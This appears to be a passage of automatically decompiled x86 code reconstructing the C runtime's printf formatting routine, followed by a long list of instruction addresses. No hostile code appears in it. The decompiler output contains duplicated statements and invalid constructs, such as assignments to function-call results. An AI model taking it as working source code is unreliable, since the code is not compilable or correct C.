                            																				if(( *(__ebp - 0x10) & 0x00001000) == 0) {
                            																					 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000020;
                            																					__eflags =  *(__ebp - 0x10) & 0x00000020;
                            																					if(( *(__ebp - 0x10) & 0x00000020) == 0) {
                            																						 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000040;
                            																						__eflags =  *(__ebp - 0x10) & 0x00000040;
                            																						if(( *(__ebp - 0x10) & 0x00000040) == 0) {
                            																							__ecx = __ebp + 0x14;
                            																							__eax = E0041C290(__ebp + 0x14);
                            																							__edx = 0;
                            																							__eflags = 0;
                            																							 *(__ebp - 0x2b8) = __eax;
                            																							 *(__ebp - 0x2b4) = 0;
                            																						} else {
                            																							__eax = __ebp + 0x14;
                            																							__eax = E0041C290(__ebp + 0x14);
                            																							asm("cdq");
                            																							 *(__ebp - 0x2b8) = __eax;
                            																							 *(__ebp - 0x2b4) = __edx;
                            																						}
                            																					} else {
                            																						 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000040;
                            																						__eflags =  *(__ebp - 0x10) & 0x00000040;
                            																						if(( *(__ebp - 0x10) & 0x00000040) == 0) {
                            																							__ecx = __ebp + 0x14;
                            																							E0041C290(__ebp + 0x14) = __ax & 0x0000ffff;
                            																							asm("cdq");
                            																							 *(__ebp - 0x2b8) = __ax & 0x0000ffff;
                            																							 *(__ebp - 0x2b4) = __edx;
                            																						} else {
                            																							__eax = __ebp + 0x14;
                            																							__eax = E0041C290(__ebp + 0x14);
                            																							__ax = __eax;
                            																							asm("cdq");
                            																							 *(__ebp - 0x2b8) = __eax;
                            																							 *(__ebp - 0x2b4) = __edx;
                            																						}
                            																					}
                            																				} else {
                            																					__eax = __ebp + 0x14;
                            																					 *(__ebp - 0x2b8) = E0041C2B0(__ebp + 0x14);
                            																					 *(__ebp - 0x2b4) = __edx;
                            																				}
                            																			} else {
                            																				__ecx = __ebp + 0x14;
                            																				 *(__ebp - 0x2b8) = E0041C2B0(__ebp + 0x14);
                            																				 *(__ebp - 0x2b4) = __edx;
                            																			}
                            																			 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000040;
                            																			__eflags =  *(__ebp - 0x10) & 0x00000040;
                            																			if(( *(__ebp - 0x10) & 0x00000040) == 0) {
                            																				goto L170;
                            																			}
                            																		case 0xa:
                            																			goto L0;
                            																		case 0xb:
                            																			L90:
                            																			__eflags =  *(__ebp - 0x30) - 0xffffffff;
                            																			if( *(__ebp - 0x30) != 0xffffffff) {
                            																				__edx =  *(__ebp - 0x30);
                            																				 *(__ebp - 0x328) =  *(__ebp - 0x30);
                            																			} else {
                            																				 *(__ebp - 0x328) = 0x7fffffff;
                            																			}
                            																			__eax =  *(__ebp - 0x328);
                            																			 *(__ebp - 0x290) =  *(__ebp - 0x328);
                            																			__ecx = __ebp + 0x14;
                            																			 *(__ebp - 4) = E0041C290(__ebp + 0x14);
                            																			 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000810;
                            																			__eflags =  *(__ebp - 0x10) & 0x00000810;
                            																			if(( *(__ebp - 0x10) & 0x00000810) == 0) {
                            																				L101:
                            																				__eflags =  *(__ebp - 4);
                            																				if( *(__ebp - 4) == 0) {
                            																					__edx =  *0x60b4f0; // 0x407424
                            																					 *(__ebp - 4) = __edx;
                            																				}
                            																				__eax =  *(__ebp - 4);
                            																				 *(__ebp - 0x28c) =  *(__ebp - 4);
                            																				while(1) {
                            																					L104:
                            																					__ecx =  *(__ebp - 0x290);
                            																					 *(__ebp - 0x290) =  *(__ebp - 0x290) - 1;
                            																					 *(__ebp - 0x290) =  *(__ebp - 0x290) - 1;
                            																					__eflags = __ecx;
                            																					if(__ecx == 0) {
                            																						break;
                            																					}
                            																					L105:
                            																					__eax =  *(__ebp - 0x28c);
                            																					__ecx =  *( *(__ebp - 0x28c));
                            																					__eflags = __ecx;
                            																					if(__ecx == 0) {
                            																						break;
                            																					}
                            																					L106:
                            																					 *(__ebp - 0x28c) =  *(__ebp - 0x28c) + 1;
                            																					 *(__ebp - 0x28c) =  *(__ebp - 0x28c) + 1;
                            																				}
                            																				L107:
                            																				__eax =  *(__ebp - 0x28c);
                            																				__eax =  *(__ebp - 0x28c) -  *(__ebp - 4);
                            																				__eflags = __eax;
                            																				 *(__ebp - 0x24) = __eax;
                            																				goto L108;
                            																			} else {
                            																				L94:
                            																				__eflags =  *(__ebp - 4);
                            																				if( *(__ebp - 4) == 0) {
                            																					__eax =  *0x60b4f4; // 0x407414
                            																					 *(__ebp - 4) = __eax;
                            																				}
                            																				 *(__ebp - 0xc) = 1;
                            																				__ecx =  *(__ebp - 4);
                            																				 *(__ebp - 0x294) =  *(__ebp - 4);
                            																				while(1) {
                            																					L97:
                            																					__edx =  *(__ebp - 0x290);
                            																					 *(__ebp - 0x290) =  *(__ebp - 0x290) - 1;
                            																					 *(__ebp - 0x290) =  *(__ebp - 0x290) - 1;
                            																					__eflags =  *(__ebp - 0x290);
                            																					if( *(__ebp - 0x290) == 0) {
                            																						break;
                            																					}
                            																					L98:
                            																					__ecx =  *(__ebp - 0x294);
                            																					__edx =  *( *(__ebp - 0x294)) & 0x0000ffff;
                            																					__eflags =  *( *(__ebp - 0x294)) & 0x0000ffff;
                            																					if(( *( *(__ebp - 0x294)) & 0x0000ffff) == 0) {
                            																						break;
                            																					}
                            																					L99:
                            																					 *(__ebp - 0x294) =  *(__ebp - 0x294) + 2;
                            																					 *(__ebp - 0x294) =  *(__ebp - 0x294) + 2;
                            																				}
                            																				L100:
                            																				 *(__ebp - 0x294) =  *(__ebp - 0x294) -  *(__ebp - 4);
                            																				__ecx =  *(__ebp - 0x294) -  *(__ebp - 4) >> 1;
                            																				 *(__ebp - 0x24) = __ecx;
                            																				L108:
                            																				while(1) {
                            																					L190:
                            																					__eflags =  *(__ebp - 0x28);
                            																					if( *(__ebp - 0x28) != 0) {
                            																						goto L216;
                            																					}
                            																					goto L191;
                            																				}
                            																			}
                            																		case 0xc:
                            																			L145:
                            																			 *(__ebp - 8) = 0xa;
                            																			while(1) {
                            																				L153:
                            																				 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00008000;
                            																				__eflags =  *(__ebp - 0x10) & 0x00008000;
                            																				if(( *(__ebp - 0x10) & 0x00008000) == 0) {
                            																					 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00001000;
                            																					__eflags =  *(__ebp - 0x10) & 0x00001000;
                            																					if(( *(__ebp - 0x10) & 0x00001000) == 0) {
                            																						 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000020;
                            																						__eflags =  *(__ebp - 0x10) & 0x00000020;
                            																						if(( *(__ebp - 0x10) & 0x00000020) == 0) {
                            																							 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000040;
                            																							__eflags =  *(__ebp - 0x10) & 0x00000040;
                            																							if(( *(__ebp - 0x10) & 0x00000040) == 0) {
                            																								__ecx = __ebp + 0x14;
                            																								__eax = E0041C290(__ebp + 0x14);
                            																								__edx = 0;
                            																								__eflags = 0;
                            																								 *(__ebp - 0x2b8) = __eax;
                            																								 *(__ebp - 0x2b4) = 0;
                            																							} else {
                            																								__eax = __ebp + 0x14;
                            																								__eax = E0041C290(__ebp + 0x14);
                            																								asm("cdq");
                            																								 *(__ebp - 0x2b8) = __eax;
                            																								 *(__ebp - 0x2b4) = __edx;
                            																							}
                            																						} else {
                            																							 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000040;
                            																							__eflags =  *(__ebp - 0x10) & 0x00000040;
                            																							if(( *(__ebp - 0x10) & 0x00000040) == 0) {
                            																								__ecx = __ebp + 0x14;
                            																								E0041C290(__ebp + 0x14) = __ax & 0x0000ffff;
                            																								asm("cdq");
                            																								 *(__ebp - 0x2b8) = __ax & 0x0000ffff;
                            																								 *(__ebp - 0x2b4) = __edx;
                            																							} else {
                            																								__eax = __ebp + 0x14;
                            																								__eax = E0041C290(__ebp + 0x14);
                            																								__ax = __eax;
                            																								asm("cdq");
                            																								 *(__ebp - 0x2b8) = __eax;
                            																								 *(__ebp - 0x2b4) = __edx;
                            																							}
                            																						}
                            																					} else {
                            																						__eax = __ebp + 0x14;
                            																						 *(__ebp - 0x2b8) = E0041C2B0(__ebp + 0x14);
                            																						 *(__ebp - 0x2b4) = __edx;
                            																					}
                            																				} else {
                            																					__ecx = __ebp + 0x14;
                            																					 *(__ebp - 0x2b8) = E0041C2B0(__ebp + 0x14);
                            																					 *(__ebp - 0x2b4) = __edx;
                            																				}
                            																				 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000040;
                            																				__eflags =  *(__ebp - 0x10) & 0x00000040;
                            																				if(( *(__ebp - 0x10) & 0x00000040) == 0) {
                            																					goto L170;
                            																				}
                            																				goto L166;
                            																			}
                            																		case 0xd:
                            																			L147:
                            																			 *(__ebp - 0x260) = 0x27;
                            																			L148:
                            																			 *(__ebp - 8) = 0x10;
                            																			 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000080;
                            																			__eflags =  *(__ebp - 0x10) & 0x00000080;
                            																			if(( *(__ebp - 0x10) & 0x00000080) != 0) {
                            																				 *(__ebp - 0x14) = 0x30;
                            																				 *(__ebp - 0x260) =  *(__ebp - 0x260) + 0x51;
                            																				__eflags =  *(__ebp - 0x260) + 0x51;
                            																				 *((char*)(__ebp - 0x13)) = __al;
                            																				 *(__ebp - 0x1c) = 2;
                            																			}
                            																			while(1) {
                            																				L153:
                            																				 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00008000;
                            																				__eflags =  *(__ebp - 0x10) & 0x00008000;
                            																				if(( *(__ebp - 0x10) & 0x00008000) == 0) {
                            																					 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00001000;
                            																					__eflags =  *(__ebp - 0x10) & 0x00001000;
                            																					if(( *(__ebp - 0x10) & 0x00001000) == 0) {
                            																						 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000020;
                            																						__eflags =  *(__ebp - 0x10) & 0x00000020;
                            																						if(( *(__ebp - 0x10) & 0x00000020) == 0) {
                            																							 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000040;
                            																							__eflags =  *(__ebp - 0x10) & 0x00000040;
                            																							if(( *(__ebp - 0x10) & 0x00000040) == 0) {
                            																								__ecx = __ebp + 0x14;
                            																								__eax = E0041C290(__ebp + 0x14);
                            																								__edx = 0;
                            																								__eflags = 0;
                            																								 *(__ebp - 0x2b8) = __eax;
                            																								 *(__ebp - 0x2b4) = 0;
                            																							} else {
                            																								__eax = __ebp + 0x14;
                            																								__eax = E0041C290(__ebp + 0x14);
                            																								asm("cdq");
                            																								 *(__ebp - 0x2b8) = __eax;
                            																								 *(__ebp - 0x2b4) = __edx;
                            																							}
                            																						} else {
                            																							 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000040;
                            																							__eflags =  *(__ebp - 0x10) & 0x00000040;
                            																							if(( *(__ebp - 0x10) & 0x00000040) == 0) {
                            																								__ecx = __ebp + 0x14;
                            																								E0041C290(__ebp + 0x14) = __ax & 0x0000ffff;
                            																								asm("cdq");
                            																								 *(__ebp - 0x2b8) = __ax & 0x0000ffff;
                            																								 *(__ebp - 0x2b4) = __edx;
                            																							} else {
                            																								__eax = __ebp + 0x14;
                            																								__eax = E0041C290(__ebp + 0x14);
                            																								__ax = __eax;
                            																								asm("cdq");
                            																								 *(__ebp - 0x2b8) = __eax;
                            																								 *(__ebp - 0x2b4) = __edx;
                            																							}
                            																						}
                            																					} else {
                            																						__eax = __ebp + 0x14;
                            																						 *(__ebp - 0x2b8) = E0041C2B0(__ebp + 0x14);
                            																						 *(__ebp - 0x2b4) = __edx;
                            																					}
                            																				} else {
                            																					__ecx = __ebp + 0x14;
                            																					 *(__ebp - 0x2b8) = E0041C2B0(__ebp + 0x14);
                            																					 *(__ebp - 0x2b4) = __edx;
                            																				}
                            																				 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000040;
                            																				__eflags =  *(__ebp - 0x10) & 0x00000040;
                            																				if(( *(__ebp - 0x10) & 0x00000040) == 0) {
                            																					goto L170;
                            																				}
                            																				goto L166;
                            																			}
                            																		case 0xe:
                            																			while(1) {
                            																				L190:
                            																				__eflags =  *(__ebp - 0x28);
                            																				if( *(__ebp - 0x28) != 0) {
                            																					goto L216;
                            																				}
                            																				goto L191;
                            																			}
                            																	}
                            																case 8:
                            																	L30:
                            																	 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000002;
                            																	 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000002;
                            																	goto L33;
                            																case 9:
                            																	L31:
                            																	 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000080;
                            																	 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000080;
                            																	goto L33;
                            																case 0xa:
                            																	L29:
                            																	__ecx =  *(__ebp - 0x10);
                            																	__ecx =  *(__ebp - 0x10) | 0x00000001;
                            																	 *(__ebp - 0x10) = __ecx;
                            																	goto L33;
                            																case 0xb:
                            																	L28:
                            																	 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000004;
                            																	 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000004;
                            																	goto L33;
                            																case 0xc:
                            																	L32:
                            																	__ecx =  *(__ebp - 0x10);
                            																	__ecx =  *(__ebp - 0x10) | 0x00000008;
                            																	__eflags = __ecx;
                            																	 *(__ebp - 0x10) = __ecx;
                            																	goto L33;
                            																case 0xd:
                            																	L33:
                            																	goto L218;
                            															}
                            														} else {
                            															if(0 == 0) {
                            																 *(_t557 - 0x314) = 0;
                            															} else {
                            																 *(_t557 - 0x314) = 1;
                            															}
                            															_t543 =  *(_t557 - 0x314);
                            															 *(_t557 - 0x278) =  *(_t557 - 0x314);
                            															if( *(_t557 - 0x278) == 0) {
                            																_push(L"(\"Incorrect format specifier\", 0)");
                            																_push(0);
                            																_push(0x460);
                            																_push(L"f:\\dd\\vctools\\crt_bld\\self_x86\\crt\\src\\output.c");
                            																_push(2);
                            																_t526 = L0040E1A0();
                            																_t559 = _t559 + 0x14;
                            																if(_t526 == 1) {
                            																	asm("int3");
                            																}
                            															}
                            															L14:
                            															if( *(_t557 - 0x278) != 0) {
                            																goto L16;
                            															} else {
                            																 *((intOrPtr*)(L0040EC70(_t543))) = 0x16;
                            																E00411A50(_t528, _t543, _t555, _t556, L"(\"Incorrect format specifier\", 0)", L"_output_s_l", L"f:\\dd\\vctools\\crt_bld\\self_x86\\crt\\src\\output.c", 0x460, 0);
                            																 *(_t557 - 0x2f0) = 0xffffffff;
                            																E0040D380(_t557 - 0x40);
                            																_t499 =  *(_t557 - 0x2f0);
                            																L229:
                            																return E00416CA0(_t499, _t528,  *(_t557 - 0x48) ^ _t557, _t547, _t555, _t556);
                            															}
                            														}
                            													}
                            													L219:
                            													__eflags =  *(_t557 - 0x25c);
                            													if( *(_t557 - 0x25c) == 0) {
                            														L222:
                            														 *(_t557 - 0x334) = 1;
                            														L223:
                            														_t530 =  *(_t557 - 0x334);
                            														 *(_t557 - 0x2e0) =  *(_t557 - 0x334);
                            														__eflags =  *(_t557 - 0x2e0);
                            														if( *(_t557 - 0x2e0) == 0) {
                            															_push(L"((state == ST_NORMAL) || (state == ST_TYPE))");
                            															_push(0);
                            															_push(0x8f5);
                            															_push(L"f:\\dd\\vctools\\crt_bld\\self_x86\\crt\\src\\output.c");
                            															_push(2);
                            															_t504 = L0040E1A0();
                            															_t559 = _t559 + 0x14;
                            															__eflags = _t504 - 1;
                            															if(_t504 == 1) {
                            																asm("int3");
                            															}
                            														}
                            														__eflags =  *(_t557 - 0x2e0);
                            														if( *(_t557 - 0x2e0) != 0) {
                            															 *(_t557 - 0x300) =  *(_t557 - 0x24c);
                            															E0040D380(_t557 - 0x40);
                            															_t499 =  *(_t557 - 0x300);
                            														} else {
                            															 *((intOrPtr*)(L0040EC70(_t530))) = 0x16;
                            															E00411A50(_t528, _t530, _t555, _t556, L"((state == ST_NORMAL) || (state == ST_TYPE))", L"_output_s_l", L"f:\\dd\\vctools\\crt_bld\\self_x86\\crt\\src\\output.c", 0x8f5, 0);
                            															 *(_t557 - 0x2fc) = 0xffffffff;
                            															E0040D380(_t557 - 0x40);
                            															_t499 =  *(_t557 - 0x2fc);
                            														}
                            														goto L229;
                            													}
                            													L220:
                            													__eflags =  *(_t557 - 0x25c) - 7;
                            													if( *(_t557 - 0x25c) == 7) {
                            														goto L222;
                            													}
                            													L221:
                            													 *(_t557 - 0x334) = 0;
                            													goto L223;
                            												}
                            											}
                            											L187:
                            											__eflags =  *(__ebp - 0x24);
                            											if( *(__ebp - 0x24) == 0) {
                            												L189:
                            												 *(__ebp - 4) =  *(__ebp - 4) - 1;
                            												 *(__ebp - 4) =  *(__ebp - 4) - 1;
                            												__eax =  *(__ebp - 4);
                            												 *( *(__ebp - 4)) = 0x30;
                            												__ecx =  *(__ebp - 0x24);
                            												__ecx =  *(__ebp - 0x24) + 1;
                            												__eflags = __ecx;
                            												 *(__ebp - 0x24) = __ecx;
                            												goto L190;
                            											}
                            											L188:
                            											__eax =  *(__ebp - 4);
                            											__ecx =  *( *(__ebp - 4));
                            											__eflags = __ecx - 0x30;
                            											if(__ecx == 0x30) {
                            												goto L190;
                            											}
                            											goto L189;
                            										}
                            										L183:
                            										__eax =  *(__ebp - 8);
                            										asm("cdq");
                            										__ecx =  *(__ebp - 0x2bc);
                            										__edx =  *(__ebp - 0x2c0);
                            										__eax = E0041CE40( *(__ebp - 0x2c0),  *(__ebp - 0x2bc),  *(__ebp - 8),  *(__ebp - 0x2c0));
                            										 *(__ebp - 0x2ac) = __eax;
                            										__eax =  *(__ebp - 8);
                            										asm("cdq");
                            										__eax =  *(__ebp - 0x2bc);
                            										__ecx =  *(__ebp - 0x2c0);
                            										 *(__ebp - 0x2c0) = E0041CDD0( *(__ebp - 0x2c0),  *(__ebp - 0x2bc),  *(__ebp - 8), __edx);
                            										 *(__ebp - 0x2bc) = __edx;
                            										__eflags =  *(__ebp - 0x2ac) - 0x39;
                            										if( *(__ebp - 0x2ac) > 0x39) {
                            											__edx =  *(__ebp - 0x2ac);
                            											__edx =  *(__ebp - 0x2ac) +  *(__ebp - 0x260);
                            											__eflags = __edx;
                            											 *(__ebp - 0x2ac) = __edx;
                            										}
                            										__eax =  *(__ebp - 4);
                            										__cl =  *(__ebp - 0x2ac);
                            										 *( *(__ebp - 4)) = __cl;
                            										 *(__ebp - 4) =  *(__ebp - 4) - 1;
                            										 *(__ebp - 4) =  *(__ebp - 4) - 1;
                            										L181:
                            										__ecx =  *(__ebp - 0x30);
                            										 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
                            										 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
                            										__eflags =  *(__ebp - 0x30);
                            										if( *(__ebp - 0x30) > 0) {
                            											goto L183;
                            										}
                            										goto L182;
                            									}
                            								}
                            								L168:
                            								__eflags =  *(__ebp - 0x2b8);
                            								if( *(__ebp - 0x2b8) >= 0) {
                            									goto L170;
                            								}
                            								goto L169;
                            								L170:
                            								__ecx =  *(__ebp - 0x2b8);
                            								 *(__ebp - 0x2c0) =  *(__ebp - 0x2b8);
                            								__edx =  *(__ebp - 0x2b4);
                            								 *(__ebp - 0x2bc) =  *(__ebp - 0x2b4);
                            								goto L171;
                            							}
                            						}
                            					}
                            				}
                            			}













                            0x00422014
                            0x00422014
                            0x00422014
                            0x00422014
                            0x00422014
                            0x00422014
                            0x00422014
                            0x0042201b
                            0x0042201b
                            0x0042201b
                            0x00422031
                            0x00422031
                            0x00422031
                            0x0042203b
                            0x0042203b
                            0x00422041
                            0x00422043
                            0x0042204d
                            0x0042204d
                            0x00422050
                            0x00422053
                            0x00422053
                            0x0042207a
                            0x0042207a
                            0x0042207d
                            0x0042207d
                            0x00422082
                            0x004220a4
                            0x004220a4
                            0x004220aa
                            0x004220cc
                            0x004220cc
                            0x004220cf
                            0x00422116
                            0x00422116
                            0x00422119
                            0x00422136
                            0x0042213a
                            0x00422142
                            0x00422142
                            0x00422144
                            0x0042214a
                            0x0042211b
                            0x0042211b
                            0x0042211f
                            0x00422127
                            0x00422128
                            0x0042212e
                            0x0042212e
                            0x004220d1
                            0x004220d4
                            0x004220d4
                            0x004220d7
                            0x004220f5
                            0x00422101
                            0x00422104
                            0x00422105
                            0x0042210b
                            0x004220d9
                            0x004220d9
                            0x004220dd
                            0x004220e5
                            0x004220e6
                            0x004220e7
                            0x004220ed
                            0x004220ed
                            0x00422111
                            0x004220ac
                            0x004220ac
                            0x004220b8
                            0x004220be
                            0x004220be
                            0x00422084
                            0x00422084
                            0x00422090
                            0x00422096
                            0x00422096
                            0x00422153
                            0x00422153
                            0x00422156
                            0x00000000
                            0x00000000
                            0x00422158
                            0x00422158
                            0x0042215f
                            0x00000000
                            0x00000000
                            0x00422161
                            0x00422161
                            0x0042216c
                            0x00422172
                            0x00422174
                            0x0042217a
                            0x0042217d
                            0x0042217f
                            0x00422185
                            0x0042218e
                            0x00422193
                            0x004221b0
                            0x004221b3
                            0x004221b3
                            0x004221b8
                            0x004221bd
                            0x004221bd
                            0x004221c3
                            0x004221c5
                            0x004221cb
                            0x004221d1
                            0x004221d1
                            0x004221da
                            0x004221da
                            0x004221c3
                            0x004221e0
                            0x004221e4
                            0x004221f2
                            0x004221f5
                            0x004221f8
                            0x004221ff
                            0x00422201
                            0x00422201
                            0x004221e6
                            0x004221e6
                            0x004221e6
                            0x0042220e
                            0x0042220e
                            0x00422214
                            0x00422216
                            0x00422216
                            0x0042221d
                            0x00422220
                            0x00422223
                            0x00422223
                            0x00422223
                            0x00422229
                            0x0042222c
                            0x0042222f
                            0x00422231
                            0x00000000
                            0x00000000
                            0x00422233
                            0x00422239
                            0x00422239
                            0x0042223f
                            0x004222bc
                            0x004222bf
                            0x004222c2
                            0x004222c5
                            0x004222c8
                            0x004222cb
                            0x004222d1
                            0x004222d1
                            0x004222d7
                            0x00422302
                            0x00422302
                            0x00422302
                            0x00422306
                            0x00000000
                            0x00000000
                            0x0042230c
                            0x0042230f
                            0x0042230f
                            0x00422312
                            0x00422317
                            0x00422317
                            0x0042231c
                            0x0042232e
                            0x0042232e
                            0x00422331
                            0x00422343
                            0x00422343
                            0x00422346
                            0x00422348
                            0x0042234c
                            0x0042234c
                            0x00422333
                            0x00422333
                            0x00422337
                            0x00422337
                            0x0042231e
                            0x0042231e
                            0x00422322
                            0x00422322
                            0x0042231c
                            0x00422356
                            0x00422359
                            0x0042235c
                            0x00422365
                            0x00422365
                            0x00422368
                            0x0042236a
                            0x00422371
                            0x00422375
                            0x0042237e
                            0x00422383
                            0x00422386
                            0x0042238d
                            0x00422391
                            0x00422395
                            0x004223a1
                            0x004223a4
                            0x004223a4
                            0x004223a7
                            0x004223ac
                            0x004223ac
                            0x004223af
                            0x004223b1
                            0x004223b8
                            0x004223bc
                            0x004223c5
                            0x004223ca
                            0x004223af
                            0x004223cd
                            0x004223d1
                            0x004224a5
                            0x004224a5
                            0x004224ac
                            0x004224b0
                            0x004224b4
                            0x004224b8
                            0x00000000
                            0x004223d7
                            0x004223d7
                            0x004223d7
                            0x004223db
                            0x00000000
                            0x00000000
                            0x004223e1
                            0x004223e1
                            0x004223eb
                            0x004223ee
                            0x004223f4
                            0x004223f7
                            0x004223fd
                            0x004223fd
                            0x004223fd
                            0x00422409
                            0x0042240c
                            0x00422412
                            0x00422414
                            0x00000000
                            0x00000000
                            0x0042241a
                            0x0042241a
                            0x00422423
                            0x0042242a
                            0x00422434
                            0x0042243b
                            0x0042244a
                            0x00422456
                            0x00422459
                            0x0042245f
                            0x00422466
                            0x00422471
                            0x00422471
                            0x00000000
                            0x00422471
                            0x00422468
                            0x00422468
                            0x0042246f
                            0x0042247d
                            0x0042247d
                            0x00422484
                            0x00422488
                            0x00422496
                            0x00000000
                            0x0042249b
                            0x00000000
                            0x0042246f
                            0x004224a3
                            0x004224c0
                            0x004224c0
                            0x004224c7
                            0x004224cc
                            0x004224cc
                            0x004224cf
                            0x004224d1
                            0x004224d8
                            0x004224dc
                            0x004224e5
                            0x004224ea
                            0x004224cf
                            0x004224c7
                            0x004224ed
                            0x004224ed
                            0x004224f1
                            0x004224f9
                            0x00422501
                            0x00422501
                            0x00422508
                            0x00422508
                            0x004215df
                            0x004215e5
                            0x004215f2
                            0x004215f7
                            0x00000000
                            0x0042160a
                            0x00421614
                            0x0042163b
                            0x00421622
                            0x00421633
                            0x00421633
                            0x00421614
                            0x00421645
                            0x0042164b
                            0x00421657
                            0x0042165a
                            0x00421668
                            0x0042166b
                            0x00421678
                            0x0042171d
                            0x00421723
                            0x00421729
                            0x00421730
                            0x00000000
                            0x00000000
                            0x00421736
                            0x0042173c
                            0x00000000
                            0x00421743
                            0x00421743
                            0x0042175b
                            0x00421760
                            0x00421763
                            0x00421765
                            0x0042181f
                            0x00421832
                            0x00421837
                            0x00000000
                            0x0042176b
                            0x0042177e
                            0x00421783
                            0x00421789
                            0x0042178b
                            0x00421794
                            0x00421794
                            0x00421797
                            0x004217a3
                            0x004217a7
                            0x004217ad
                            0x004217af
                            0x004217b4
                            0x004217b6
                            0x004217bb
                            0x004217c0
                            0x004217c2
                            0x004217c7
                            0x004217ca
                            0x004217cd
                            0x004217cf
                            0x004217cf
                            0x004217cd
                            0x004217d0
                            0x004217d0
                            0x004217d7
                            0x00000000
                            0x004217d9
                            0x004217de
                            0x004217fa
                            0x00421802
                            0x0042180f
                            0x00421814
                            0x00000000
                            0x00421814
                            0x004217d7
                            0x00000000
                            0x0042183f
                            0x0042183f
                            0x00421846
                            0x00421849
                            0x0042184c
                            0x0042184f
                            0x00421852
                            0x00421855
                            0x00421858
                            0x0042185f
                            0x00421866
                            0x00000000
                            0x00000000
                            0x00421872
                            0x00421872
                            0x00421879
                            0x00421885
                            0x00421888
                            0x0042188e
                            0x00421895
                            0x00000000
                            0x00000000
                            0x00421897
                            0x00421897
                            0x0042189d
                            0x0042189d
                            0x004218a4
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x004218e7
                            0x004218e7
                            0x004218ee
                            0x004218f1
                            0x0042191b
                            0x0042191e
                            0x0042191e
                            0x00421921
                            0x00421928
                            0x00421928
                            0x0042192c
                            0x004218f3
                            0x004218f3
                            0x004218ff
                            0x00421902
                            0x00421906
                            0x00421908
                            0x0042190b
                            0x0042190b
                            0x0042190e
                            0x00421914
                            0x00421916
                            0x00421916
                            0x00421919
                            0x00000000
                            0x00000000
                            0x00421934
                            0x00421934
                            0x00000000
                            0x00000000
                            0x00421940
                            0x00421940
                            0x00421947
                            0x0042194a
                            0x0042196a
                            0x0042196d
                            0x0042196d
                            0x00421977
                            0x00421977
                            0x0042197b
                            0x0042194c
                            0x0042194c
                            0x00421958
                            0x0042195b
                            0x0042195f
                            0x00421961
                            0x00421961
                            0x00421968
                            0x00000000
                            0x00000000
                            0x00421983
                            0x00421983
                            0x0042198a
                            0x00421996
                            0x00421999
                            0x0042199f
                            0x004219a6
                            0x00421ab9
                            0x00000000
                            0x00421ab9
                            0x004219ac
                            0x004219ac
                            0x004219b2
                            0x004219b2
                            0x004219b9
                            0x00000000
                            0x004219ef
                            0x004219ef
                            0x004219f2
                            0x004219f5
                            0x004219f8
                            0x00421a20
                            0x00421a20
                            0x00421a23
                            0x00421a26
                            0x00421a29
                            0x00421a4e
                            0x00421a4e
                            0x00421a51
                            0x00421a54
                            0x00421a57
                            0x00421a90
                            0x00421aa1
                            0x00000000
                            0x00421aa1
                            0x00421a59
                            0x00421a59
                            0x00421a5c
                            0x00421a5f
                            0x00421a62
                            0x00000000
                            0x00000000
                            0x00421a64
                            0x00421a64
                            0x00421a67
                            0x00421a6a
                            0x00421a6d
                            0x00000000
                            0x00000000
                            0x00421a6f
                            0x00421a6f
                            0x00421a72
                            0x00421a75
                            0x00421a78
                            0x00000000
                            0x00000000
                            0x00421a7a
                            0x00421a7a
                            0x00421a7d
                            0x00421a80
                            0x00421a83
                            0x00000000
                            0x00000000
                            0x00421a85
                            0x00421a85
                            0x00421a88
                            0x00421a8b
                            0x00421a8e
                            0x00421a92
                            0x00000000
                            0x00421a92
                            0x00000000
                            0x00421a8e
                            0x00421a2b
                            0x00421a2b
                            0x00421a2e
                            0x00421a32
                            0x00421a35
                            0x00000000
                            0x00421a37
                            0x00421a3a
                            0x00421a3d
                            0x00421a40
                            0x00421a43
                            0x00421a49
                            0x00000000
                            0x00421a49
                            0x00421a35
                            0x004219fa
                            0x004219fa
                            0x004219fd
                            0x00421a01
                            0x00421a04
                            0x00000000
                            0x00421a06
                            0x00421a09
                            0x00421a0c
                            0x00421a0f
                            0x00421a12
                            0x00421a18
                            0x00000000
                            0x00421a18
                            0x00000000
                            0x00421aa3
                            0x00421aa6
                            0x00421aa9
                            0x00000000
                            0x00000000
                            0x004219c0
                            0x004219c0
                            0x004219c3
                            0x004219c6
                            0x004219c9
                            0x004219e1
                            0x004219e4
                            0x004219e4
                            0x004219e7
                            0x004219cb
                            0x004219ce
                            0x004219d1
                            0x004219d7
                            0x004219dc
                            0x004219dc
                            0x00000000
                            0x00000000
                            0x00421aae
                            0x00421aae
                            0x00421ab1
                            0x00421ab1
                            0x00421ab6
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00421abe
                            0x00421abe
                            0x00421ac5
                            0x00421ad1
                            0x00421ad4
                            0x00421ada
                            0x00421ae1
                            0x00422302
                            0x00422302
                            0x00422302
                            0x00422306
                            0x00000000
                            0x00000000
